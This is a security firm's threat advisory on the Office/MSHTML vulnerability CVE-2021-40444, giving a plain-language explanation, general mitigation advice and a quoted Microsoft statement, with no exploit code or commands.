Threat Advisory: Office 365 and Office 2019 on Windows 10

A new troubling remote code execution vulnerability has been discovered that affects customers using Office 365 and Office 2019 on Windows 10 and is already being exploited by malicious actors.

By way of non-technical explanation, this vulnerability essentially means that a malicious actor can send you an infected Office document (word, excel, etc) via email (or another regular way - think a co-worker accidentally forwarding you the malicious file via your internal filesharing systems). Whilst it’s the case that when you open documents from the internet Office opens them in "Protected Mode" - which doesn't allow you to edit, change, or save the file - once you click "Enable Editing”, the malicious code can execute on your system.

However, security researchers have tested this vulnerability with files outside of the regular Word/Excel/PowerPoint type (specifically with a file extension of .rtf), and since this file type has no protected mode, it means the malicious code is executed as soon as the file is opened. There may be additional file types this applies to - the details are still coming.

Security Recommendations for Mitigation:

At current, there’s no existing patch for this vulnerability. There are some general mitigation strategies such as ensuring your anti-malware product is up to date, and it’s worth getting someone from within your security team (or your security provider) to make sure your endpoint protection is configured correctly so as to alert you to any suspicious files that fit this type of attack.

In general, the advice given from our offensive security team is to remind staff within your organisation to not open attachments from unknown sources, or to open unexpected attachments, particularly if they’re unsolicited.

If you’re concerned about your security in light of this latest vulnerability, the team at Security Centric can help examine your Office 365 security configuration against best practise. Given part of the attack technique can involve phishing, and general best security practices are part of a good defence, this is a good reminder to refresh or implement some simulated phishing and security awareness training for your organisation.

Further information on this vulnerability:

This vulnerability is known as CVE-2021-40444, and the following information was released by Microsoft:
"Microsoft is investigating reports of a remote code execution vulnerability in MSHTML that affects Microsoft Windows. Microsoft is aware of targeted attacks that attempt to exploit this vulnerability by using specially crafted Microsoft Office documents.

An attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine. The attacker would then have to convince the user to open the malicious document. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

Microsoft Defender Antivirus and Microsoft Defender for Endpoint both provide detection and protections for the known vulnerability. Customers should keep anti-malware products up to date. Customers who utilize automatic updates do not need to take additional action. Enterprise customers who manage updates should select the detection build 1.349.22.0 or newer and deploy it across their environments. Microsoft Defender for Endpoint alerts will be displayed as: “Suspicious Cpl File Execution”.”

The full advisory from Microsoft can be found here: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444

If you’re more technically minded and looking for some neat proof of concepts of the various attack methods they can be found on Twitter here:

1. Malicious Microsoft Office document
2. Malicious .rtf document

Need help with your organisation's cybersecurity? Contact us to discuss how we can help you be more secure and reduce your business risk.